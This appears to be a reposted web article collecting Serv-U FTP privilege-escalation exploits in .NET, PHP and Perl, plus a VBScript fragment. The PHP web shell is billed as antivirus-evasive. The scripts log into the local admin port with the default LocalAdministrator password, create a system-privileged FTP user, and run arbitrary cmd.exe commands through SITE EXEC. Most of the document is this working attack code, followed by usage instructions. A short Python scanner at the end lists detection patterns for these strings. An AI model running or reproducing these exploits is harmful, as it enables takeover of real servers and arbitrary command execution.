
C.net/Perl/PHP: three versions of ServU privilege-escalation source code

2023-08-27 08:54:02

“南音” collected and submitted to this site 2 articles on ServU privilege-escalation source code in C.net/Perl/PHP versions; they are reproduced below.


Part 1: .NET/Perl/PHP: three versions of ServU privilege-escalation source code

1. .NET version of the Serv-U privilege-escalation program

<%@ Page Language=“VB” Debug=“true” %>

<%@ import Namespace=“System.Net.Sockets” %>

from Serv-U 2

admin by lake2

Name

LocalAdministrator

PWD

#l@$ak#.lk;0@P

Port

43958

cmd

2. PHP version of the Serv-U privilege-escalation trojan

/**

Comment-padded antivirus-evasion version

**/

//

//Codez begin

//

//Check the value of magic_quotes_gpc

if (get_magic_quotes_gpc) {

$_GET = stripslashes_array($_GET);

}

//Initialize variables

$addr = ’0.0.0.0’;

$ftpport = 21;

$adminport = 43958;

$adminuser = ’LocalAdministrator’;

$adminpass = ’#l@$ak#.lk;0@P’;

$user = ’wofeiwo’;

$password = ’wrsky’;

$homedir = ’C:\\’;

$dir = ’C:\\WINNT\\System32\\’;

//Assign the supplied values if anything was changed

if ($_GET){

$addr = $_GET[’addr’] ;

$ftpport = $_GET[’ftpport’] ;

$adminport = $_GET[’adminport’] ;

$adminuser = $_GET[’adminuser’] ;

$adminpass = $_GET[’adminpass’] ;

$user = $_GET[’user’] ;

$password = $_GET[’password’] ;

$homedir = $_GET[’homedir’] ;

if ($_GET[’dir’]){

$dir = $_GET[’dir’] ;

}

}

?>

-==-

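Serv-U All Version local privilege escalation Exp10it Ver 1.5

Add Serv-U user section

Host IP:

Host FTP port:

Host FTP admin port:

Host FTP admin user:

Host FTP admin password:

Username to add:

Password for the added user:

User home directory (don't forget the trailing “\”):


//Add user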

if ($_GET[’action’]==“up”){

up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);

}

?>


Command execution section

Host FTP port:

Username:

User password:

System path (don't forget the trailing “\”):

Command to execute:


//Execute command

if ($_GET[’action’]==“execute”){

ftpcmd($ftpport,$user,$password,$dir,$_GET[’cmd’]);

}

?>


Copycenter (C) 我非我 All centers Reserved.

//Definition of the main add-user function

function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){

$fp = fsockopen (“127.0.0.1”, $adminport, $errno, $errstr, 8);

if (!$fp) {

echo “$errstr ($errno)

\n”;

} else {

fputs ($fp, “USER ”.$adminuser.“\r\n”);

sleep (1);

fputs ($fp, “PASS ”.$adminpass.“\r\n”);

sleep (1);

fputs ($fp, “SITE MAINTENANCE\r\n”);

sleep (1);

fputs ($fp, “-SETUSERSETUP\r\n”);

fputs ($fp, “-IP=”.$addr.“\r\n”);

fputs ($fp, “-PortNo=”.$ftpport.“\r\n”);

fputs ($fp, “-User=”.$user.“\r\n”);

fputs ($fp, “-Password=”.$password.“\r\n”);

fputs ($fp, “-HomeDir=”.$homedir.“\r\n”);

fputs ($fp, “-LoginMesFile=\r\n”);

fputs ($fp, “-Disable=0\r\n”);

fputs ($fp, “-RelPaths=0\r\n”);

fputs ($fp, “-NeedSecure=0\r\n”);

fputs ($fp, “-HideHidden=0\r\n”);

fputs ($fp, “-AlwaysAllowLogin=0\r\n”);

fputs ($fp, “-ChangePassword=1\r\n”);

fputs ($fp, “-QuotaEnable=0\r\n”);

fputs ($fp, “-MaxUsersLoginPerIP=-1\r\n”);

fputs ($fp, “-SpeedLimitUp=-1\r\n”);

fputs ($fp, “-SpeedLimitDown=-1\r\n”);

fputs ($fp, “-MaxNrUsers=-1\r\n”);

fputs ($fp, “-IdleTimeOut=600\r\n”);

fputs ($fp, “-SessionTimeOut=-1\r\n”);

fputs ($fp, “-Expire=0\r\n”);

fputs ($fp, “-RatioUp=1\r\n”);

fputs ($fp, “-RatioDown=1\r\n”);

fputs ($fp, “-RatiosCredit=0\r\n”);

fputs ($fp, “-QuotaCurrent=0\r\n”);

fputs ($fp, “-QuotaMaximum=0\r\n”);

fputs ($fp, “-Maintenance=System\r\n”);

fputs ($fp, “-PasswordType=Regular\r\n”);

fputs ($fp, “-Ratios=None\r\n”);

fputs ($fp, “ Access=”.$homedir.“|RWAMELCDP\r\n”);

fputs ($fp, “QUIT\r\n”);

sleep (1);

while (!feof($fp)) {

echo fgets ($fp,128);

}

}

}

//Definition of the main command-execution function

function ftpcmd($ftpport,$user,$password,$dir,$cmd){

$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);

if (!$conn_id) {

echo “$errstr ($errno)

\n”;

} else {

fputs ($conn_id, “USER ”.$user.“\r\n”);

sleep (1);

fputs ($conn_id, “PASS ”.$password.“\r\n”);

sleep (1);

fputs ($conn_id, “SITE EXEC ”.$dir.“cmd.exe /c ”.$cmd.“\r\n”);

fputs ($conn_id, “QUIT\r\n”);

sleep (1);

while (!feof($conn_id)) {

echo fgets ($conn_id,128);

}

fclose($conn_id);

}

}

//Strip escape characters

function stripslashes_array(&$array) {

while (list($key,$var) = each($array)) {

if ($key != ’argc’ && $key != ’argv’ && (strtoupper($key) != $key || ’’.intval($key) == “$key”)) {

if (is_string($var)) {

$array[$key] = stripslashes($var);

}

if (is_array($var)) {

$array[$key] = stripslashes_array($var);

}

}

}

return $array;

}

?>

3. Perl version of the Serv-U privilege-escalation program

#!/usr/bin/perl

use I:Socket;

binmode(STDOUT);

syswrite(STDOUT, “Content-type: text/html\r\n\r\n”, 27);

$addr = “127.0.0.1”;

$ftpport = 21;

$adminport = 43958;

$adminuser = “LocalAdministrator”;

$adminpass = ’#l@$ak#.lk;0@P’;

$user = “Andyower”;

$password = “haika”;

$homedir = ’C:\\’;

$dir = ’C:\\WINNT\\System32\\’;

use I:Socket::INET;

$sock = I:Socket::INET->new(“127.0.0.1:$adminport”) || die “fail”;

print “Andyower制作

”;

print $sock “USER $adminuser\r\n”;

sleep (1);

print $sock “PASS $adminpass\r\n”;

sleep(1);

print $sock “SITE MAINTENANCE\r\n”;

sleep(1);

print $sock “-SETUSERSETUP\r\n”;

print $sock “-IP=”.$addr.“\r\n”;

print $sock “-PortNo=”.$ftpport.“\r\n”;

print $sock “-User=”.$user.“\r\n”;

print $sock “-Password=”.$password.“\r\n”;

print $sock “-HomeDir=”.$homedir.“\r\n”;

print $sock “-LoginMesFile=\r\n”;

print $sock “-Disable=0\r\n”;

print $sock “-RelPaths=0\r\n”;

print $sock “-NeedSecure=0\r\n”;

print $sock “-HideHidden=0\r\n”;

print $sock “-AlwaysAllowLogin=0\r\n”;

print $sock “-ChangePassword=1\r\n”;

print $sock “-QuotaEnable=0\r\n”;

print $sock “-MaxUsersLoginPerIP=-1\r\n”;

print $sock “-SpeedLimitUp=-1\r\n”;

print $sock “-SpeedLimitDown=-1\r\n”;

print $sock “-MaxNrUsers=-1\r\n”;

print $sock “-IdleTimeOut=600\r\n”;

print $sock “-SessionTimeOut=-1\r\n”;

print $sock “-Expire=0\r\n”;

print $sock “-RatioUp=1\r\n”;

print $sock “-RatioDown=1\r\n”;

print $sock “-RatiosCredit=0\r\n”;

print $sock “-QuotaCurrent=0\r\n”;

print $sock “-QuotaMaximum=0\r\n”;

print $sock “-Maintenance=System\r\n”;

print $sock “-PasswordType=Regular\r\n”;

print $sock “-Ratios=None\r\n”;

print $sock “ Access=”.$homedir.“|RWAMELCDP\r\n”;

print $sock “QUIT\r\n”;

@ret=<$sock>;

print “@ret”;

close(STDERR);

close(STDOUT);

exit;

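Part 2: SERVU 6.4 privilege-escalation script that works across SERVU versions (script security)

The privilege-escalation code is as follows: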

ftpport = 65500

timeout=3

loginuser = “User ” & user & vbCrLf

loginpass = “Pass ” & pass & vbCrLf

deldomain = “-DeleteDOMAIN” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “ PortNo=” & ftpport & vbCrLf

mt = “SITE MAINTENANCE” & vbCrLf

newdomain = “-SETDOMAIN” & vbCrLf & “-Domain=goldsun|0.0.0.0|” & ftpport & “|-1|1|0” & vbCrLf & “-TZOEnable=0” & vbCrLf & “ TZOKey=” & vbCrLf

newuser = “-SETUSERSETUP” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “-PortNo=” & ftpport & vbCrLf & “-User=go” & vbCrLf & “-Password=od” & vbCrLf & _

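Change ftpport to 21.

In newdomain, change the part after goldsun| to the IP (the IP address of the server on which privileges are to be escalated)|

In newuser, change -IP= to the same IP address as above (the IP address of the server on which privileges are to be escalated)... OK... escalate privileges... this uses FTP to add a user that can execute commands... with this user there is nothing that cannot be done.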
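A defender-side check for the scripts above, added here as an example and not part of the original submissions: it walks a web root and flags script files that contain the Serv-U local-administration strings these scripts rely on (the `SITE MAINTENANCE` command block, the `LocalAdministrator` account and port 43958). The weights, threshold, extension list and sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile
# Indicator strings come from the scripts on this page; weights/threshold are assumed.
INDICATORS = {
    "maintenance_cmd": (re.compile(r"SITE\s+MAINTENANCE", re.I), 3),
    "set_user_setup": (re.compile(r"-SETUSERSETUP", re.I), 3),
    "domain_edit": (re.compile(r"-(SETDOMAIN|DeleteDOMAIN)", re.I), 3),
    "system_priv": (re.compile(r"-Maintenance=System", re.I), 2),
    "site_exec": (re.compile(r"SITE\s+EXEC", re.I), 2),
    "local_admin": (re.compile(r"LocalAdministrator"), 2),
    "default_pass": (re.compile(re.escape("#l@$ak#.lk;0@P")), 3),
    "admin_port": (re.compile(r"\b43958\b"), 1),
}
SCRIPT_EXTS = {".php", ".asp", ".aspx", ".pl", ".cgi", ".vbs"}
THRESHOLD = 5

def score_text(text):
    """Return (score, sorted indicator names) for one file's contents."""
    hits = sorted(n for n, (rx, _w) in INDICATORS.items() if rx.search(text))
    return sum(INDICATORS[n][1] for n in hits), hits

def scan_tree(root):
    """Report script files under root that score at or above THRESHOLD."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    score, hits = score_text(fh.read())
                if score >= THRESHOLD:
                    findings.append((os.path.relpath(path, root), score, hits))
    return sorted(findings)

def demo():
    """Scan constructed sample files written to a temporary web root."""
    samples = {  # constructed inputs, not real captures
        "x.php": r'$adminport = 43958; fputs($fp, "SITE MAINTENANCE\r\n"); fputs($fp, "-SETUSERSETUP\r\n");',
        "help.php": "<?php echo 'FTP servers may support SITE EXEC'; ?>",
        "notes.txt": "SITE MAINTENANCE -SETUSERSETUP LocalAdministrator",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A single weak indicator such as a mention of `SITE EXEC` stays below the threshold; the maintenance-command block combined with the admin port or account is what raises a finding.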
